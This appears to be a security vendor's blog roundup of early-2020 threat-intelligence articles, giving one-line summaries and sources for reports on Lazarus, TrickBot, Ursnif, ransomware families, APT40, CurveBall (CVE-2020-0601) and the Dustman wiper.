Articles from the last couple of weeks reveal news about cyber threats targeting the electric utility industry and hackers boring into the gas company industry. And with the events in and around Iran, there were concerns on widespread cyber attacks that could happen.
For more articles, check out our #onpatrol4malware blog.
Operation AppleJeus Sequel
Source: Secure List
In 2018, Kaspersky published a report on one of Lazarus’ campaigns, named Operation AppleJeus. Notably, this operation marked the first time Lazarus had targeted macOS users. Read more.
Top-Tier Russian Organized Cybercrime Group Unveils Fileless Stealthy “PowerTrick†Backdoor for High-Value Targets
Source: SentinelLabs
The TrickBot cybercrime enterprise actively develops many of its offensive tools such as “PowerTrick†that are leveraged for stealthiness. Read more.
Threat Research
SAIGON, the Mysterious Ursnif Fork
Source: Fire Eye
Ursnif (aka Gozi/Gozi-ISFB) is one of the oldest banking malware families still in active distribution. Read more.
North American Electric Cyber Threat Perspective
Source: Dragos
The electric utility industry is a valuable target for adversaries seeking to exploit ICS and OT for a variety of purposes. Read more.
Russians Hacked Ukrainian Gas Company at Center of Impeachment
Source: The New York Times
With President Trump facing an impeachment trial, Russian military hackers have been boring into the Ukrainian gas company at the center of the affair, according to security experts. Read more.
DeathRansom Part II: Attribution
Source: Fortinet
In this second part, FortiGuard Labs will try to shed a light on how this DeathRansom campaign is connected with other campaigns, and who might be behind them. Read more.
Assessing Iran’s Digital Attack Capabilities
Source: Zerofox
There has been increased speculation and tension surrounding the potential cyber-attacks directed towards the US and its allies. Read more.
Satan ransomware rebrands as 5ss5c ransomware
Source: Blaze
The cybercrime group that brought us Satan, DBGer and Lucky ransomware and perhaps Iron ransomware, has now come up with a new version or rebranding named “5ss5c”. Read more.
Hainan Xiandun Technology Company is APT40
Source: Instrution Truth
Instrution Truth identified a constellation of front companies for APT activity in Hainan and a computer science specialist at Hainan University who is linked to one of the companies. Read more.
Emotet remains the dark market leader for delivery-as-a-service
Source: Help Net Security
The vast majority of nationally sponsored cybersecurity incidents take the form of espionage through data exfiltration, with frequent employment of remote access tool Plug-X, according to the annual threat report by eSentire. Read more.
Iran and Not Iran: What Our Threat Monitoring Indicates
Source: Team Cymru
We now have a moment to assess the cyber actions in the wake of events in and around Iran. There was concern that the Iranian regime would respond with widespread cyber attacks. Read more.
Beware of this sneaky phishing technique now being used in more attacks
Source: ZDNet
There’s been a large rise in cyber criminals using a particular phishing technique to trick workers into unwittingly installing malware, transferring money or handing over their login credentials. Read more.
Uncle Sam compensates you for data leaks (yeah, right)
Source: Kaspersky
Data leaks of all sorts regularly crop up in the news, and recently so have fines, some potentially reaching into the billions, slapped on the companies responsible. Read more.
CVE-2020-0601 AKA ChainOfFools OR CurveBall
Source: GitHub Gist
Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601. The vulnerability was discovered by the U.S. National Security Agency followed by a blog post and an official security advisory. Read more.
Comparative Analysis of New ZeroCleare Variant, Dustman
Source: IBM X-Force Exchange
A new Wiper malware called Dustman was identified by Saudi Arabia’s National CyberSecurity Authority (NCA) which was believed to be a variant of the ZeroCleare malware identified by X-Force IRIS earlier in 2019. Read more.
Deep Dive into the Lyceum Danbot Malware
Source: CyberX
LYCEUM is a threat group first identified by Dell SecureWorks, which appears to be interested in organizations with ICS such as oil and gas companies in the Middle East. Read more.